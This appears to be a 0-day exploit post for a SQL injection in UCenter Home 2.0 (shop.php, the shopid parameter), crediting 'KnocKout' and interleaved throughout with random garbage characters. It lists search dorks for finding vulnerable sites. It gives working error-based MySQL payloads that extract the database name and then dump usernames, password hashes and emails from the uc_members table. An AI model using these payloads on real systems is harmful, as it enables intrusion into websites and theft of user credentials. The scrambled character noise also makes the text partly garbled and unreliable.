+ B: K. P( C2 F6 t* U! v8 f' z__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
* M- _+ U3 Y1 t; }2 }
8 h$ X# s3 ^* N2 t0 p N5 q3 ?0 T2 l' L7 X
! [; R2 L7 n! S, M6 ~
*/ Author : KnocKout @2 {$ N# H6 T% j1 ~
! b' {4 z4 j2 K. Y' I+ L4 V*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers : B/ d/ \' |9 {! Y- z& j. D% ?
' [( q( Z! U4 g6 P
*/ Contact: knockoutr@msn.com + O' p. O) f( ^
' A' f9 R' h. a" {& A, u! J( T; [*/ Cyber-Warrior.org/CWKnocKout
3 p5 Y2 V6 o7 ?" h. d
! @+ s* J9 b5 K7 x5 u# K__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
U7 M) r+ Y! Y& @( y" d
: j) i0 W! q- F8 f1 sScript : UCenter Home
5 Z0 @4 _+ ^6 p; g- D0 ~; D: W, U2 w+ f% ?5 G2 C
Version : 2.0
& g; g' y& e* E! G$ V6 r f/ \
3 h# F5 r5 h" y# Q" LScript HomePage : http://u.discuz.net/ # |. H* C% X& A$ C" p
`8 l3 H& Y: W__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
$ K9 v& p! d$ o7 n; u! E& j3 u, \* I( @- I
Dork : Powered by UCenter inurl:shop.php?ac=view
" @- ^) V4 j/ i+ q( l) v; i% f# h9 h& E& T1 E+ P
Dork 2 : inurl:shop.php?ac=view&shopid=
O& U/ O/ `' F8 b* j
2 X0 V- Y* x1 ^0 ^0 r__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( Q6 ~& w# y' R6 S
. N O8 X" p) e- |4 {6 RVuln file : Shop.php
( W* D) V5 L1 d( G& R' x& W. y' V% _; ?. G
value's : (?)ac=view&shopid= ; s3 R7 |5 R& N. F8 b: Q
& L' ^9 j3 ~4 E$ X. p) }9 DVulnerable Style : SQL Injection (MySQL Error Based) t* ~8 I o. |. K& E
# |5 o, ?" _& c! g$ o" R
Need Metarials : Hex Conversion 0 Z+ g4 O: x. h* [
* u9 D2 [( b) D o__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== " `% H4 e& B8 M5 [7 T
F/ Y8 N& `- G& w
Your Need victim Database name. 3 [8 B5 m% F: f: q
% Q: ^9 K7 ]0 p' b( Y- T0 T
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
' G- e5 r. S/ Q( e# U3 z8 R( o) p* g& ]; {
..
2 S8 S, r B5 ~5 e# A2 G7 ]
% P+ |5 g$ L& B- N3 M8 c7 {6 B1 R& MDB : Okey. # x! `4 |; b5 O# I5 O
3 g) v3 M7 n: {1 [
your edit DB `[TARGET DB NAME]` 2 |+ r+ A% S: i. d! i- ^
8 P9 F. Y- R* x! k# gExample : 'hiwir1_ucenter'
1 S6 y5 P6 g+ v* B0 Q/ ] Y
" }" o- i- l9 I& z2 x) YEdit : Okey. . W" Q! d @) X9 J
/ e) L7 m2 j* n5 s
Your use Hex conversion. And edit Your SQL Injection Exploit.. , r: b1 r- j, C9 m. m$ N
/ w, e2 Y4 R6 d e4 Z7 N) q
4 {& o& w) ]& P$ s* _: E
7 b8 p- l* a- n: |- I
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
8 W5 a8 d l# L |